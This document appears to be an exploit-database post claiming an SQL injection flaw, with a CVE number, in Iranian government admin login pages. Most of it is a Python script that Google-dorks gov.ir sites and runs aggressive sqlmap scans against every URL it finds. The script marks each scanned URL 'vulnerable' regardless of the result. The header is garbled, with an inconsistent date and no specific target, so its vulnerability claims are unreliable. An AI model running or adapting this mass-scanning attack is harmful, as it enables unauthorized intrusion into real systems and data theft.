*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-
This is a security issue and a method of attack against a site owned by the Islamic Republic of Iran government that has a security issue with the SQL INJECTION vulnerability "CWE-89".
We have repeatedly reported this site to have a security issue and they have ignored our report.
We would like to file this security issue
*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-
</>
Нубы изучают готовые программы :))
Мы, профессионалы, пишем программу, которая делает все это одновременно ;)
</>
/*!
- # VULNERABILITY: Website Iranian goverment admin find and Automatic Bypassing 0day attacker
- # Authenticated Persistent SQL injection
- # GOOGLE DORK: site:gov.ir admin login.php
- # DATE: November 12/09/2024
- # SECURITY RESEARCHER: E1.Coders
- # CWE: CWE-89
- # CVE: CVE-2024-9986
*/
### -- [ Info: ]
[i] A valid persistent SQL INJECTION vulnerability was discovered in of the iranian GOV website .
[i] Vulnerable parameter(s): - gov.ir admin login.php
### -- [ Impact: ]
[~] Malicious SQL code injections, the ability to combine attack vectors against the targeted system, which can lead to a complete compromise of the resource.
### -- [ Details: ]
[~] vulnerable file is "login page" and "Query sql inj attack"
### -- [ EXPLOIT : ]
import subprocess
import requests
from bs4 import BeautifulSoup
import time
import os
def google_search(query):
headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'}
google_url = f'https://www.google.com/search?q={query}'
try:
response = requests.get(google_url, headers=headers)
response.raise_for_status()
return response.text
except requests.exceptions.RequestException as e:
print(f"Error while fetching Google search results: {e}")
return None
def extract_iranian_urls(search_results):
soup = BeautifulSoup(search_results, 'html.parser')
links = []
for a_tag in soup.find_all('a', href=True):
link = a_tag['href']
if "http" in link:
if ".ir" in link:
links.append(link)
return links
def run_sqlmap(url):
try:
sqlmap_path = 'K/Кодировщики/КАРТА ПАМЯТИ/sqlmap.py'
command = [
'python',
sqlmap_path,
'-u', url,
'--batch',
'--level=5',
'--risk=3',
'--threads=4',
'--output-dir=output',
'--flush-session',
'--tamper=between',
'--technique=BEUSTQ',
'--forms',
'--crawl=2',
'--random-agent',
]
subprocess.run(command, check=True)
print(f"SQLMap execution completed for {url}")
except subprocess.CalledProcessError as e:
print(f"Error occurred while running sqlmap on {url}: {e}")
def save_vulnerable_url(url):
with open("aaaa.txt", "a") as file:
file.write(f"Vulnerable URL: {url}\n")
print(f"Vulnerable URL saved: {url}")
def main():
google_dork = "site:gov.ir admin login.php"
print(f"Searching for: {google_dork}")
search_results = google_search(google_dork)
if search_results:
urls = extract_iranian_urls(search_results)
print(f"Found {len(urls)} Iranian URLs. Testing for SQL Injection...")
for url in urls:
print(f"Running SQLMap on {url}...")
run_sqlmap(url)
save_vulnerable_url(url)
time.sleep(5)
if __name__ == '__main__':
if not os.path.exists('output'):
os.makedirs('output')
main()
### -- [ Contacts: ]
[+] E-Mail: E1.Coders@Mail.Ru
[+] GitHub: @e1coders
